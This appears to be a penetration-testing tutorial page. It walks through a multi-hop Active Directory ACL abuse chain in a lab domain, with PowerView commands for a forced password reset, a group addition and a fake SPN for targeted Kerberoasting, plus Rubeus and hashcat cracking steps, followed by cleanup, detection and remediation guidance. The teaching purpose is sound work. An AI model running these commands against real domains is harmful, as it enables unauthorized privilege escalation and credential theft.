Keyboard shortcuts

Press ← or β†’ to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

ACL Abuse Tactics

End-to-end walkthrough of executing a multi-hop ACL attack chain, from initial foothold through targeted Kerberoasting, including cleanup and detection/remediation guidance.

Attack Chain Overview

wley (compromised via Responder + Hashcat)
  β†’ ForceChangePassword β†’ damundsen
    β†’ GenericWrite β†’ Help Desk Level 1 (add damundsen)
      β†’ MemberOf β†’ Information Technology (nested)
        β†’ GenericAll β†’ adunn (targeted Kerberoast)
          β†’ DS-Replication-Get-Changes β†’ DCSync

Step 1: Force Change Password (wley β†’ damundsen)

Authenticate as the controlled user

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

Set the new password and change it

Import-Module .\PowerView.ps1
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

From Linux, the pth-net tool (part of pth-toolkit) can accomplish the same.

Step 2: Add to Group (damundsen β†’ Help Desk Level 1)

Authenticate as damundsen

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)

Verify current membership, add, and confirm

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Through nested group membership (Help Desk Level 1 β†’ Information Technology), damundsen now inherits GenericAll over the adunn user.

Step 3: Targeted Kerberoasting (GenericAll β†’ adunn)

When a target account can’t be interrupted (e.g., admin account), prefer targeted Kerberoasting over password reset: assign a fake SPN, request the TGS, and crack offline.

Create a fake SPN

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

From Linux, the targetedKerberoast tool creates a temporary SPN, retrieves the hash, and deletes the SPN in one command.

Kerberoast the account

.\Rubeus.exe kerberoast /user:adunn /nowrap

Crack the hash offline

hashcat -m 13100 adunn_tgs /usr/share/wordlists/rockyou.txt

With the cleartext password, authenticate as adunn and proceed to DCSync.

Cleanup (Order Matters)

Cleanup must happen in reverse order β€” remove the SPN before removing the group membership, since group membership grants the rights needed to modify the SPN.

1. Remove the fake SPN

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

2. Remove damundsen from the group

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

3. Verify removal

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName | ? {$_.MemberName -eq 'damundsen'}

4. Coordinate password restoration

Work with the client to reset the damundsen password to its original value or a new known value.

Document every modification in the assessment report and confirm all changes were reverted.

Detection & Remediation

Auditing

ControlDetails
Regular ACL auditsUse BloodHound to identify and remove dangerous ACLs. Train internal staff to run these tools.
Monitor group membershipAlert on changes to high-impact groups (Domain Admins, Enterprise Admins, sensitive security groups).
Advanced Security Audit PolicyEnable auditing to detect ACL modifications via Event ID 5136.

Event ID 5136: Directory Service Object Modified

Logged when a domain object’s ACL is changed. The event details are in SDDL (Security Descriptor Definition Language) format, which is not human-readable by default.

Convert SDDL to readable format:

ConvertFrom-SddlString "<SDDL_STRING>" | select -ExpandProperty DiscretionaryAcl

Look for unexpected principals with GenericWrite, GenericAll, or WriteDACL on high-value objects β€” these indicate potential ACL attack setup.

Remediation Recommendations

  • Audit and remove dangerous ACLs on a regular cadence
  • Monitor high-impact group membership for unauthorized changes
  • Enable Advanced Security Audit Policy for directory service changes
  • Use tools like BloodHound proactively (not just offensively) to map and reduce ACL attack surface
  • Be aware that software installs (especially Exchange) can introduce excessive ACLs